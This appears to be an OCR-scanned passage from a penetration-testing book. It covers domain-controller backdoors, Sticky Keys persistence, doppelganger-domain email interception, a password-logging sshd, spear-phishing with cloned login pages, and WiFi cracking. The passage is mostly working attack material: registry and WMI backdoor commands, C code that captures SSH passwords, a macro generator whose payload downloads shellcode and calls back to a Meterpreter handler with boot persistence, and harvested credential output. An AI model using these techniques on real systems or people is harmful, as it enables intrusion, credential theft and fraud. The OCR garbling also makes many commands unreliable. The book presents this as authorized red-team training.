backdoor password “mimikatz”. 





m ' .WndomVayNl^rT! ^zycnxt 


C:\Users\testuserl\Desktop>dir \\dc\C$ 

Access is denied. 

C:\Users\testuserl\Desktop>net use * \\dc\c$ mimikatz /user:labiflhacker.testlab 
Drive Z: is now connected to \\dc\c$. 

The command completed successfully. 


C:\Users\testuserl\Desktop>dir Z: 
Volume in drive Z has no label. 
Volume Serial Number is 40F8-1BB4 


Directory of Z:\ 


08/22/2013 

08:52 

AM 

<DIR> 

PerfLogs 

12/28/2014 

03:28 

PM 

<DIR> 

Program Files 

08/22/2013 

08:39 

AM 

<DIR> 

Program Files (x86) 

01/19/2015 

05:35 

PM 

<DIR> 

Share 

02/05/2015 

12:29 

AM 

<DIR> 

Users 

01/05/2015 

02:02 

AM 

<DIR> 

Windows 


0 File(s) 0 bytes 

i Dir(s) 20,905,398,272 bytes free 


Skeleton Key - Backdoor Password 


We now have full access into the domain controller with our backdoor password. Both the original 
domain admin’s password and mimikatz will work at the same time. 


Sticky Keys 


Sticky Keys is one of my favorite persistence methods. If you have never dealt with sticky keys 
before, try hitting shift 5 times on any Windows host. Microsoft states that: 


“StickyKeys is designed for people who have difficulty holding down two or more keys at a time. 
When a shortcut requires a key combination such as Ctrl+P, StickyKeys allows you to press one key 
at a time instead of pressing them simultaneously.” {29} 


We can take advantage of sticky keys by replacing the sticky key executable with a shell. The old 
method used to manually replace sethc with cmd, but this can now be done within registry settings. 


• REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution Options\sethc.exe" /v Debugger /t REG SZ /d 
"C:\windows\system32\cmd.exe" 

• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal 

Server\WinStations\RDP-Tcp" /v UserAuthentication/t REG DWORD /d 0 

• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal 

Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG DWORD /d 0 


Two additional settings you might need to run: 





• Change firewall setting to allow RDP 

o netsh advfirewall firewall set rule group-'remote desktop" new 
enable=Yes 

• Enable Remote Desktop Connections 

o REG ADD 

"HKE YLOC AL_MACH1NE\S Y STEM\CurrentControl Set\Control\T er 
Server" /v fDenyTSConnections /t REG DWORD /d 0 /f 


Don’t forget the power of WMI and being able to trigger these settings remotely. Remember you will 
be a privileged local administrative account or domain admin. 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows 
NT/CurrentVersion/ftnage File Execution Options\sethc.exe\" /v Debugger /t REG SZ 
/d \"C:\windows\system32\cmd.exe\" /f ’ 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 

"C:\Windows\system32\reg.exe ADD 

\"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server/WinStations/RDP- 
Tcp\" /v User Authentication /t REGDWORD /d 0 /f' 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 

"C:\Windows\system32\reg.exe ADD 

\"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server/WinStations/RDP- 
Tcp\" /v SecurityLayer /t REG DWORD /d 0 /f' 

Optional Commands: 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop/" 
new enable=Yes" 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 

"C:\Windows\system32\reg.exe ADD 

\"HKEY_LOCAL_MACHINE\S Y STEM\CurrentControlSet\Control\T erminal 
Server/" /v fDenyTSConnections /t REG DWORD /d 0 /f' 


Because we are leveraging WMI, you also have the ability to use Kerberos, if needed, by changing 
the username/password to /authority:"Kerberos:[Domain]/[Server]". Remember pass the ticket? 


Once we have configured these registry settings, we can RDP to that host without any credentials, hit 
shift 5 times, and we have a system shell. 


If you ever lose your original shell and the user changes their password, you still have your backdoor. 




Sticky Keys 


Conclusion 


I hope this chapter was able to get you comfortable with getting onto the network and moving laterally 
through the network. There are a large number of attacks that can help in both lateral movement and 
privilege escalation, but it really comes down to understanding what is in scope of your test and what 
has the highest probability of assisting you. It might take a few of the attacks in the Lateral Movement 
section to get you to a Domain Administrator, but keep this chapter handy as sometimes you will run 
into a brick wall and something in this book might just get you out of a jam. 







The Screen - Social Engineering 


If client attacks are in the scope of your tests, social engineering is your "go to" attack. There are 
many different ways to perform social engineering attacks and these can range from domain attacks to 
spear phishing, or even dropping USB sticks. Since social engineering attacks really use your own 
creativity, I will just go over a few examples that I have found to be fruitful. 


Doppelganger Domains 

I spent a lot of research time looking into doppelganger domains and trying to find the most efficient 
and most “bang for your buck” attacks. You can find more in my research paper here: 

http://www.wired.com/tlTreatlevel/2011/09/doppelganger-domaias/ . 

The concept of my research paper was to brute-force company domains for valid subdomains that had 
MX records. For my next few examples we have two different fictitious companies who utilize their 
sub-domains for email: us.company.com and uk.company.com. What I had done was to purchase all 
domains for uscompany.com, ukcompany.com and so on. This is because end users very frequently 
make the mistake of forgetting to type in the period between the domain and sub-domain. 


SMTP Attack 


Once I purchased these domains, I set up an SMTP server, configured the MX records, and finally set 
all SMTP servers as catch-all servers. This means that if anyone emails to the domain I own, 
regardless of to whom it is sent, I would record/forward all those emails to an account of my choice. 


This is usually enough to prove that you can successfully capture sensitive data and that you will see a 
lot of sensitive emails from the corporation. If you go to the article above, you will see what type of 
data was gathered and how many times we were able to get SSH/VPN/Remote Access into a 
company. We also took this proof of concept attack one step farther. 


In the following example, we are targeting the fake site bank.com, who has a subsidiary in Russia. 
The fake bank owns ru.bank.com and has MX records to that FQDN. Also, company.com (another 
fake company), owns us.company.com and has MX records for that FQDN. In this fake example, we 
purchase both the doppelganger domains uscompany.com and rucompany.com. If anyone mistypes an 
email to either domain, we will be able to inject ourselves into the middle of this conversation. Using 
a few simple python scripts, when we receive an email from john@us.company.com to 
bob@rubank.com (mistyped doppelganger for ru.bank.com), our script will take that email and create 
a new email to bob@ru.bank.com (the proper email address) and sourced from 
john@uscompany.com (the mistyped doppelganger that we own). That means any reply response to 
John from Bob will come back through us. Now, we have a full "Man in the MailBox" configured and 
can either just passively listen or attack the victims based on the trust factor they have with each 



other. 


Man in the MailBox (MITMB) 

Original E-mail Conversation 
(®us.company.com . -■ (®ru.bank.com 




MITMB 


(S5us.company.com 


(Suscompany.com 


E mail sent to the wrong address 


to the wre 

peffHer. 

ess after n 

W 1 

ndsoackw 

w 

mainfRh 


(Srubank.com 


(Sru.bank.com 


Using the recipient doppelganger, we forward the request 
to the proper address after modifying the email 

(Suscompany.com ^_ 11 a_ (Sru.bank.com 

'mt 

The user at ru.bank.com responds back with the requested information 
@us.company.com (©rubank.com 


We respond to the original cmWIm the information and the sender is 
unaware of the incident 

•Red domains are the domains under our control 


Man in the MailBox Example 


SSH Attack 


During my research, I also configured SSH servers with the doppelganger domains to see if people 
mistyped SSH servers and revealed their SSH passwords. There are a couple of things that need to be 
configured for a successful attack. 

First, set the DNS A record to point all records to a particular IP. For example, I set the A record 
host to and pointed the host record to my IP address. Any subdomain within the doppelganger will 
point back to my server. This means the following domains will all point back to a single IP: 

• test.uscompany.com 

• dev.uscomany.com 

• deadbeef.uscompany.com 

Then, set up an SSH server that logs both the username and password. In my case, I configured a 
server running Ubuntu 11.10. Since normal sshd does not record the passwords, I had to modify a 
version of sshd. This is done by downloading openssh portable 5.9pl: 
wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9pl.tar.gz 

To Extract OpenSSH: 

• tar xvfz openssh-5.9pl .tar.gz 

• Go into the openssh directory: 

o cd openssh-5.9pl 

It is required to modify the auth-passwd.c file before compiling sshd. Below is what I changed, but I 











have also included the whole auth-passwd.c file you should replace 
[ https://www.securepla.net/download/auth-passwd. c ]: (301 


in sshd 


if( !sys_auth_passwd(authctxt, password)) 

{ 

FILE *garp; 

garp = fopen(7var/log/sshd_logged", "a"); 
chmod( "/var/log/sshd logged", 0600); 

fprintf( garp,"%s:%s:%s\n",authctxt->user,password,get_remote_ipaddr()); 
fclose(garp); 

} 

return (result && ok); 


Now, when I have an invalid login, I write out the username, password, and IP address into a file 
located in/var/log/sshd_logged. 

After replacing the auth-passwd.c file, let's compile and make it: 

• sudo ./configure — prefix=/opt — sysconfdir=/etc/ssh 

• make 

• sudo make install 


I should have a working version of our new sshd service. To start sshd: 

• /opt/sbin/sshd 

Then, run the command and you should see username password combinations scroll by: 

• tail -f /var/log/sshd_loggcd 


Output: 

• root: HarmonOl: 192.168.10.10 

• admin: AMW&369!: 192.168.10.111 

• tomihama: tomihhama: 192.168.10.24 

• root: hx7wnk: 192.168.10.19 


We are successfully recording username/password combinations. You will have to be extremely 
patient with this attack and hope a developer or IT user mistypes the domains to SSH. I love these 
attacks because they are not the normal types of attacks and give you the chance to get creative with 
them. 


Phishing 


Phishing, or email in general, is one of the most commonly used and effective vectors for remote 
attacks. This is because they rely on users as victims, instead of unpatched or misconfigured services. 



Victims can be easily swayed to perform actions generally based on fear and urgency. The fear and/or 
urgency usually stems from some type of financial loss, personal loss, or the fear of missing out. If 
you can trigger one of these emotions, it can cause a victim to do things they wouldn’t normally do. 
Although there are numerous books on manipulating people, two books I would recommend: 

• Behavioral Programming (2015): The Manipulation of Social Interaction - 
http: // amzn. to/1C JGb4v 

• Social Engineering: The Art of Human Hacking (2010) - http://amzn.to/lCJH3pO 


These books describe types of social interactions, manipulation of people, word selection, and many 
tools for all methods of social engineering. 


In the first THP, I focused on using Metasploit pro, but I decided to go with open source in this 
example, which allows me to get more creative. After setting up a few phishing exercises, you will 
see that it is pretty easy. 


There are plenty of open source phishing tools, such as: 

• Catero: http://section91abs.github.io/Cartero/ 

• Phishing Frenzy: http://www.phishingfrenzy.com/ 

• Social Engineering Toolkit: https://github.com/trustedsec/social-engineer-toolkit 


However, after running numerous phishing attacks, I found that having numerous custom scripts ready 
for different scenarios works best. Although this might not work for your situation, this should help 
you get different ideas for a successful campaign. 


Manual Phishing Code 

( https://github.com/cheetz/ spearphishing ftKali Linux): 


This is a sample beta code I have written to take care of my spear phishing campaigns. The code 
repository is located here: https://github.com/cheetz/spearphishing and it is really up to you to 
customize it for your own campaign. In the default code, we are going to use GoDaddy’s SMTP 
services, but you can easily customize it according to your own SMTP server. The spear.py client 
script will modify an html page that will get sent to all it’s victims. Take time to read and understand 
the code before executing. Let’s walkthrough a phishing example. 

Setting up the client to send out emails: 

• cd /opt/spearphishing/client 

• edit spear.py and modify the following: 

o domain = "suck.yourdomainthatyouown.com" #The Domain That You 
Own 

o companyname = "SUCK" #The Company Name 
o me = "auto-confirm@" + domain #Email return address 
o host = 'smtpout.secureserver.nef #Godaddy SMTP server 









o login = " #Godaddy Login 
o password = " #Godaddy password 
o edit emails.txt and add email addresses 


To run the SMTP script : 

• python ./spear.py 


GDmMc Xcoofcttt* >*CS$* flnorim* Dlrruget* / Information • ©W • /OutUn* • /««.«* -/'Tools * <>v.«w Source * |||C 



compose I Your Suck order of "2" x TV Stick. 


x (31.311) 


•uto-conflrmQsocic-atoftsinonltorconi 


10 41 PM (8 mil 




SUCK 


Order Confirmati 

OrOer #142-3644477-7222S 


Thank you for shoppwig wrth us. Wei send a confirmation once your items have shaped Your order details arc 
mdeated below. If you would fee lo view the status of your order or make any changes to *. please visit Your 
Orders on SUCK oom 


Your estimated delivery date is: 

Wednesday. December 3. 2014 

Your shipping speed: 

Two-Day Shipping 


Your order will be sent to: 

John Valdez 
3491 OCEAN CUT LN 
VIRGINIA BEACH, VA 23451-4106 
Untied States 


Order %0 


GET A $10 GIFT CARD upon approval lor tte Store Card 

Order Details 

Order #142-3644477-72229022 
Placed on Thursday. November 13. 2014 

$39.00 

(or less) 

Why* 7 


2 x TV Stick 
Electronics 

hu -<u tnte rwia«4 


https //suck.*terumomtor.com/7M_iessi0n-0S8Se69bbc9e4040bb<9e404C'f3268e7&ge-dH000M0MEBS''£BnUU0M£BSjb20- 


Sample Spearphishing Email 


If you look closely at the bottom, all URLs point to our domain with both the session ID and ge ID. 
One thing you need to do is heavily test your phishing exercises. There are some phishing campaigns 
that get flagged as SPAM and others that don’t. You need to find that right balance. 


Web Filtering Bypass for Your Domains: 

Once in a while, I will see a company actively using a web proxy for all of their Internet traffic. In 
this situation, anything that isn't categorized will be blocked and my reverse shells can’t seem to work 
around their filter. However, there are things you can do to help your success rate. For doppelganger 
domains that I have purchased specifically for testing, I set up a simple CNAME or Canonical Name 
on that domain to point to the original domain that I have doppelgangered. I will let that doppelganger 
domain sit there for a few days or weeks before the test. Why? This will allow the site to get 
automatically crawled by a number of different systems. When the crawlers see the CNAME 
configured to the real site, they will assume that it was purchased by that company and turn that 
domain into the same category of approved domains. Once your test starts, just remove the CNAME 
and configure the IP of the actual malicious server. 


Setting Up the Server: 




















We are going to setup a web server that will look like a real authentication page to capture 
credentials. 

• cd /opt/set 

• ./setoolkit 

• 1) Social-Engineering Attacks 

• 2) Website Attack Vectors 

• 3) Credential Harvester Attack Method 

• 2) Site Cloner 

• set:webattack> IP address for the POST back in Harvester/Tabnabbing: [your kali 
IP] 

• set:webattack> Enter the url to clone: [Website to Clone] 


mete no refer > kerbsros_ticket_purge 

[+J Kerberos tickets purged 

meterorefer > kerberos ticket_use /opt/ticket,txt 

[*] Using Kerberos ticPet stored in /opf/ticket,tst, 1093 bytes 

l+j Kerberos ticket applied successfully 

me tero refer > kerberos_ticket_Ust 

Kerberos Tickets 


iServer Client Start End 


krbtgt/hacker $ hacker lab $ hacker 2015-91-07 08:37:54.OCX) 2025-01-07 08:37:54,000 
E r FORWARDABLE) 

Total Tickets ; 1 
mete ro. refer > | 











File Edit View Search Terminal Help 


to a report 

[-) This option is used for what IP the server will POST to. 

[-J If you're using an external IP, use your external IP for this 
■ : • tv. jck> IP address for the POST back in Harvester/Tabnabl92 
M SET supports both HTTP and HTTPS 
M Example; http://www,thisisafakesite.Com 
•' ; > Enter the url to clone:https:// suckctestlab 

[*] Cloning the website: https://github.com/login 
[*] This could take a little bit,.. 


f i He rp- aval 1 abl 0 rril set ^ rantur^Si all POSTs on a w^h 

I X — In U □ W I C. O \ ul 1. L LI U v C « I 1 mm U| V I U !. U J □ j v I J X XT i— Ul t»- L . 1 J _ X 1 9 v. L f U iJ i! □ '«j I I O i i C k. 

[*] Apache is set to ON - everything will be placed in your web ro 
f apache, 

[*] Files will be written out to the root directory of apache. 

[*] ALL files are within your Apache directory since you specified 
[I] Apache may be not running, do you want SET to start the proces 
Apache Webserver is set to ON. Copying over PHP file to the websit 
Please note that all output from the harvester will be found under 
rvester_date. txt 

Feel free to customize post.php in the /var/www directory 

[*] All files have been copied to /var/www 

{Press return to continue}|j_ 


Social Engineering Toolkit - Clone Site 


Let's make some quick modifications. To help make spear phishing more successful, make sure it 
looks authentic and minimize the amount of information the user needs to input. A simple way to 
accomplish this is to add their email address in the login field. This makes it look like they have 
logged onto this site before. 


Once you have cloned a site, all files are copied to /var/www. Let's modify the files: 

1. cd/var/www 

2. We need to make the file be able to support server side scripting 


1. mv index.html index.php 





3. We need to identify the username field. If we open the original login page, right-click in the 
Username Field, and Inspect Element (in Firefox). We can quickly see where the code is in this 
field and modify our file to include the victim’s email address. 



Sign in 


Username 

ttsl3| 

Password 

Sign in 


j o Inspector 

y Console © Debugger 

Qf Style Ed*or 

© Performance 7 Network 

mL > bodypnvitc 

mode.logged out enterprise dw ■vrjppi 

rr drv ste.clearfu 

6v*srte-container contest-loader-contei. dw*log< 

w ediv cla? 

» <label 

i s«* auth- Coro-body *> 
for.-iofin_field-></ledel> 



1 cinput id-"login_field" class-Mopi/t-block* 

type**text" tabindex-*!" narae-"login" auto*ocus-*»utofo<us" autol 

► < label 

for* "password" X/1abel> 



cinput 

id*"passw<Kd" class«"inpwt-block" t>i 

>e«"password" taoir 

■Oe« ■" 2 " nawe* "password* ></input> 


Fake Login Page 


Undo 

£°py 

Caste 

Delete 

Sctad ft! 

Add a Keyword for ttw Search. 
Check Spelling 
Inspect Element (Q) 

& Wjb Developer ► 

@ NoSciipt « 

"if Inspect Element wdh Firebug 


4. gedit index.php and locate the code from step 3 (in this specific scenario, we case search for 
login field) and add the code below. This automatically appends the user’s email in the login 
field and 4b is used solely for tracking purposes. 

1. Inside the login input field, add: value-'<?php if(isset($_GET['ge'])) (echo 

base64_decode($_GET[ , ge']);} ?>" 

2. Somewhere below, add: <input type="hidden" name="user_id" value="<?php print 
$_GET["id_session"] ;?>"/> 
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Code Modifications to Include User Email Address 


Now, we can go visit the cloned website we created. If we add two additional parameters to the 
index.php page, we can see how this small change can increase our success rate. The ge field accepts 
a base64 string, using “Ym9va0B0aG\foYWNrZXJwbGF5Ym9vay5jb20=, which decodes to 
book@thehackerplaybook.com There is also an id session field that is just an MD5 of the original 
email address. I do this in the event they decide to change the username email address to a different 
email address, I will know which original user is inputting these requests. 



© Disable* X Cookies- / CSS- u Forms- U Images* O Information- | Miscellaneous- f Outline* 



Sign in 1 


Username 


1 

book@thehackerpiaybook com 



Password 







Sign in 


Login with User Email 


When anyone types in their password and hits the “Sign in” button, this information will all be logged 











to a file called harvester, along with the date. Let’s read the file by: cat harvester* 


root((ikali:/var/www# cat harvester* 

Array 

( 

[authenticity_token] => 8nU5hP60AAkZo5KAw== 
[login] => book@thehackerplaybook.com 
[password] => happyhacking! 

[user_id] => 58330bcfdb5c499194603O48c3810134 
[commit] => Sign in 

) 

root((ik ali:/var/www# 


Password Results 


The reason I go through the manual method of creating spear phish emails and client servers, is to 
have it look as authentic and specific as possible. There are a lot of different tools that can be 
purchased to provide spear phishing campaigns, but most are limited in the types of sites or templates 
that are included. 


Social Engineering with Microsoft Excel 


In the first book, I explained how to add macros manually to create malicious Excel payloads that can 
be used in Spear Phishing Campaigns. This section is an extension of that. 


Sometimes you find yourself in an environment where you can't use JAVA, or web-based attacks. It 
might be because you have to deliver your payload via an email attachment or want to use physical 
media for your attack (i.e. USB sticks or CDs). One of the best success rates I have had with these 
types of attacks was by utilizing a trust relationship between the attacker and victim and including an 
Excel spreadsheet that had a Meterpreter payload. When I say a trust relationship, I mean find 
someone with whom the victim might regularly communicate files and spoof his or her email address. 
Even better, in the initial Compromised List section, you might have been able to gain a few 
credentials. Log into the corporate Outlook Web Access (OWA) mail server and start emailing 
employees that have regular communication with your compromised credential. 

The problem with using Metasploit to generate its own Excel files is that a lot of times they will 
trigger anti-virus. To mitigate this, we are going to use the same tactics we did in the Lateral 
Movement section and take advantage of PowerShell. 


On your Windows Attacking Host, download Generate-Macro.ps 1: 
https://raw.githubusercontent.com/enigmaOx3/Generate-Macro/master/Generate-Macro.psl 

Generate-Macro.ps 1 creates a malicious Excel file with a PowerShell payload to connect back to a 
Metasploit Meterpreter handler. It even goes one step farther and adds persistence by creating a vbs 
file in the C:\users\public\ folder and adding a registry setting to call that script upon bootup. 






C:\Users\hp2\Downloads\Generate-Macro-master>powershell -exec bypass 
PS C:\Users\hp2\Downloads\Generate-Macro-master> AGenerate-Macro.ps 1 
Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): 
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke- 
-Shellcode.ps 1 

Enter IP Address: 192.168.199.128 
Enter Port Number: 443 

Enter the name of the document (Do not include a file extension): records 

-Select Attack-- 

1. Meterpreter Shell with Logon Persistence 

2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local 
admin) 

3. Meterpreter Shell with Microsoft Outlook Email Persistence 


Select Attack Number & Press Enter: 1 

-Select Payload- 

1. Meterpreter Reverse HTTPS 

2. Meterpreter Reverse HTTP 


Select Payload Number & Press Enter: 1 
Saved to file C:\Users\hp2\Desktop\records.xls 

Next, we need to setup our standard Meterpreter Handler: 

• cd /opt/ 

• msfconsole -r ./listener.rc 


Open up the Excel file: 
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Paste 
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Excel Malicious File 


Here is the Macro File that was generated by the PowerShell Script: 



| (General) 

3u£ Auto Cper. O 


VBAPro)ect (recorrftjdt: 

*| Haoacft txai Objects 

g 9*»ti{5h«u) 

■ 


Execute 

Persist 

Start 


SpModfe* 

•SJ ModJel 


End Sub _ 

Public function Execute() As Variant 


Const MIDDEN JIIKDOW - 0 
strCooputer • 

Set ob}HMIService • OetObject |*vina«atts!\\" 


& strCoaputer ft 


■\root\ciatv2*) 


Set ob^Startup • objMXIService.Cet(•Hin3a_ProcessStartup") 

Set objConfig • objStartup.Spawnlnstance_ 
cfcj Conflg. ShowWmdov - HIDDCN_WIHDOW 

Set ob^Process • OetCbject("wirasgwtts:\\* ft strCeeeputer ft "\root\cmv2:Min32_Process") 
ob3Process.Create "powrshell.exe -ExecutionPolicy Bypass -KindowStyle Midden -ncprofil 
End functioo 


x 


Public function Persist<) As Variant 
Set fs ■ CreateObject("Scripting.FileSyjte®Cteject"> 

Set a - fs.CreateTextfile("C:\Users\Public\config.txt", True) 
a.MnteLme ("Dm ob;Shell") 

a.WriteLine ("Set objShell - MScnpt.CreateObject(""KScript.Shell"")") 

a.NnteLme ("ccnnand - •"C:\WXNDOWS\ay0teaJ2\Wi.ndov8Pover3hell\Yl.O\povershell.exe -ep Byp 
a.NriteLine ("objShell.Run coaaeand,0") 
a.WriteLine ("5et ob^Shell - Nothing") 
a.Close 

GivenLocation • "C!\Dsers\Public\" 

CldfileNaae - "config.txt” 

NewfileNase - "eonfig.vbs" 

Nace GieenLocation ft OldFileHaste As GivenLocatlon ft NewFileNase 

(.•«». 1 ^. t t at xttfl a MbUi . 4 . 4 -.- 

Malicious Macro File 


When you enable the Macro, it will connect back to your Kali Meterpreter handler: 


ESI ntploitllijiiil 'i ] * 

!*) U2.1H.K9.13413 tavtlt r*t«l«l4 for /INITH... 

|‘j IS!,163,109,1:24153 Staging correction for target /SMITH received... 

1*1 Meterpreter sansum 3 opsnatf (19!, 188.199.123:443 ■» 19!, 163,199,1:24153} at !0i5-&2-fi! 17:14:29 -9W0 

Hit 0ipl5lt(li.'rj a MfllOnf -1 3 
j*l Starting interaction with 3,,, 

natarpraw i shall 
Pnsciss 13676 crwttf, 

Channel 1 crest id, 

Hicrosoft Windows (Version 6.1,7831] 

Copyright ■ c] 2335 Mlcras&ft Carporatlan. 411 rights rasafYtd. 


Excel Execution - Meterpreter 



The script will also add persistence. It creates a file in C:\Users\Public\ called eonfig.vbs. It also 
creates a registry entry under: HKCU\Software\Microsoft\Windows 

NT\CurrentVersion\Windows\Load to start that vbs file upon bootup. 


So, every time this system reboots, the PowerShell script will download invoke-shellcode and 
connect back to your Meterpreter handler. 
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Registry Persistence 


I ran these Excel files through numerous AV tools and not a single one triggered. As long as you can 
get a user to enable the Macro, you are good to go. 


Phishing Reporting 


As stated many times throughout this book, the most important part of any test is reporting. I have 
linked a sample phishing report that you can use as a template. 

• Work with the security team to figure out how many users reported the phish 

• Record information that includes how many users clicked/opened the attachment and 
how many conversions (i.e. entered password/executed malicious files) 

• Identify if the security team would have been notified by their users if this had been 
a real attack 

• Since every social engineering attack is very different, a section should include 
reasons for successes or failures 

• Remediation plan or areas to improve results 


I haven’t seen many public templates for phishing campaigns, but have 
included a sample report at: 

http://thehackerplaybook.com/Download/2015_RT_Phishing_SUCK_REPQRT.pdf . 
















The Onside Kick - Attacks That Require Physical 
Access 


The onside kick is a dangerous tactic that provides huge beneficial results. The problem with these 
types of attacks is that they generally require close proximity and have high potential of alarming your 
victim. In this chapter, I will explain how to exploit wireless networks, card cloning, creating a 
penetration drop box, and dropping USB sticks. Please remember, if you are going to do these types 
of attacks, then get written approval from the company with which you are working. 


Exploiting Wireless 

Before we begin talking about exploiting wireless, I want to state that many of the basic attacks for 
WIFI haven’t changed from the previous book. To eliminate the need to carry two books, I have 
included the relevant WIFI material from the last book along with the newer attacks. 


I am often asked what the best card is for wireless sniffing and attacking. I don't have the exact 
technical comparison, but from my experience, I have had the most success and luck with the Alfa 
AWUS036NHA.{31} This USB wireless adaptor supports 802.11 a/b/fyn and works natively with 
Backtrack and Kali. This card also uses the Atheros chip set, of which I am a big fan. The reason that 
I use a USB wireless card is that my Kali system is generally a VM, which can't utilize the native 
built-in wireless card. 


Passive - Identification and Reconnaissance 

Passive WIFI testing puts the WIFI card in a sniffing mode to identify access points, clients, signal 
strengths, encryption types, and more. In a passive mode, your system will not interact with any of the 
devices, but this mode is used for recon/identification. 

To start any WIFI assessment, first kick off Kismet. Kismet is a great WIFI tool to sniff, identify, and 
monitor wireless traffic. At any terminal window in Kali, type: 

• kismet 


This will open the Kismet application, which will need your wireless interface information (you can 
do a quick ifconfig on a separate terminal window to find this information). In this case, my wireless 
interface is on wlanl. 


If everything works properly, you can close that window (try pressing the tab button if you are stuck) 
and you will see a listing of all the SSIDs, channels, signal strength, and more. 



SSIDs and AP information 


The colors of the different wireless networks represent the following: 

• Yellow - Unencrypted Network 

• Red - Factory default settings in use 

• Green - Secure Networks (WEP, WPA, etc.) 

• Blue - SSID cloaking on / Broadcast SSID disabled{32} 


After selecting an SSID, you will immediately see information about that Access Point such as the 
BSSID, manufacturer, type of encryption (in this 

case WEP), and signal strength/packet loss. This is great for identifying where an access point is 
located and how we are going to attack it. 


By pressing the (tilde) key, V key, and then the C key, you will see all the clients that are 
connected to this access point. 




X Network Details n 


Clients c 


X Signal Level 
X Packet Rate 
Retry Rate 

-110 - | 
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0 - 

Name: drunk 



Finding Clients Connected to an AP 

This is useful when doing de-authentication attacks or denial of service attacks against the access 
point in the Active Attacks section. 

Active Attacks 



After you identify the networks you are to attack or networks that are within scope of your 
assessment, you need to figure out which active attacks to use. We are going to focus on four main 
types of attacks-those against WEP, WPAv2, WPA WPS, and WPA Enterprise. 


One thing I want to reiterate is that we are going for the quickest and easiest way to crack wireless 
passwords or gain access to a wireless infrastructure. There are many different tools to attack WIFI 
faircrack-n g http://www.aircrack-ng.org/ is one of my favorites), but I will focus on getting the job 
complete. 


WEP - Wired Equivalent Privacy 

We should all know by now that using WEP for wireless networks is insecure. I won't go into the 
details, but if you want to read about how it was implemented and configured improperly, you can 
visit the Wikipedia page: 

http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy . 






If the organization is utilizing WEP and has at least one client, you should be able to crack the WEP 
password without an issue. 


To accomplish this, we are going to use the Fern-Wi-Fi-Cracker tool to identify WEP networks and 
attempt to crack them. I am using Fern-Wi-Fi-Cracker because it is native to Kali and utilizes 
Aircrack-ng (which is my favorite Wi-Fi tool). One quick caveat: for the example below, the access 
point you are attacking needs to have at least one active host on that network. There are ways to get 
around this (search Newsham's Attack), but I won't go over them in this book because the following 
attack is the most common situation you will run into. 


How to Crack WEP in Kali: 

• At a command prompt, type: 

o fern-wifi-cracker 

• Select the drop down and pick your Wi-Fi (most likely wlanO) 

• Click the Scan button 

• And drop into WEP (the red Wi-Fi sign) 



Fern WIFI Cracker 


• Select the SSID you want to attack (in this case, Rocket) 

• Click on Wi-Fi Attack on the right side 

• Watch the IV count. You will need at least 10k IVs to crack the password 

• If it is successful, you will see the WEP key below 






WEP Key Cracking 


Now, you can connect to that SSID and are now on that network. 

WPAv2 fTKTPI - Wi-Fi Protected Access 

WPAv2 doesn't have a vulnerability like WEP, so cracking the password is much more difficult. To 
have a successful attack, you need to capture the authentication handshake from a client to the access 
point. To cheat in this process, we can force a user to de-authenticate and then re-authenticate. Once 
we capture the handshake, we won't be able to just strip the password out-we will have to brute- 
force or crack the password. Let's see this in progress. 


Before we can start sniffing, we need to enable the capture file settings within Fern-WiFi-Cracker, in 
order to use this handshake file to crack. 

• At a command prompt, type: 

o fern-WiFi-cracker 

• Go to the ToolBox 

• Click on the WIFI Attack Options 

• Select Capture File Settings 









WIFI Attack Setting* 


Oefautt MAC Settings 


£ Capture fie setting« 

Set □ rectory far itomgcapture fies far oftre uup 

/root/Detktop 





Coda Hpckar 


tan tot Attest parts 


Ray Puucn 


3*«wra( Settings 




Fott Seltnp 



creek Version ■srrraci-mj 1 2 I 
Ot Ver start 4.9 I 



I TOOIBOI 


About Fern WIFI Cracker 

GUI state far wireless encryptson iirrnqm testngof 902 11 mtaen encryption it ends rd access pores 
Written by Sercui ftrmta ESAo Report Bugs et tenoboy i^rotketmeil tem 


Enabling Capture File Settings 


• Hit ESC until you are back at the home screen of Fern-Wifi-Cracker 

• Select the drop down and pick your Wi-Fi (most likely wlanO) 

• Click the Scan button 

• And drop into WPA (the blue Wi-Fi sign) 

• Select your SSID to attack 

• Click on WIFI Attack 

• In the following image, you will see the cap file created 
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WPA Handshake Capture 


We need to first clean the cap file to make sure it will work with our password cracker. This can be 
accomplished with wpaclean: 

• wpaclean <out.cap> <in.cap> 


Please note that the wpaclean options are the <out.cap> <in.cap> instead of <in.cap> <out.cap> 
which may cause some confusion. {33} 

To crack the WPA handshake, we need to convert the clean cap file into an hccap file. We are going 
to do this with aircrack-ng: 

• aircrack-ng <out.cap> -J <out.hccap> 

• Note the - J is an upper case J and not lower case j. 








:-/Desktop# wpaclean out.cap belkin.cba_Capture_File\(WPA\).cap 
Pwning be'lkin.cba_Capture_Fi'le(Vi/PA) .cap (1/1 100%) 

Net 94:44:52: belkin.cba 

Done 

:-/Desktop# aircrack-ng out.cap -J out.hecap 
Opening out.cap 
Read 3 packets. 

# BSSID ESSID Encryption 

1 94:44:52: » belkin.cba WPA (1 handshake) 

Choosing first network as target. 

Opening out.cap 

Reading packets, please wait... 

Building Hashcat (1.00) file... 

[*) ESSID (length: 10): belkin.cba 
(*] Key version: 2 
(♦) BSSID: 94:44: 

[♦] STA: 20:C9:D0: 


[*] anonce: 
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Cleaning WPA Files 


This will give you the file that you use to crack into oclHashcat. Remember that the only way to get 
the password for WPAv2 is to brute-force the password. To see how to accomplish WPAv2 hccap 
password-cracking, go to the Cracking WPAv2 with oclHashcat section below. 


WPAv2 WPS (Wi-Fi Protected Setup) Attacks 

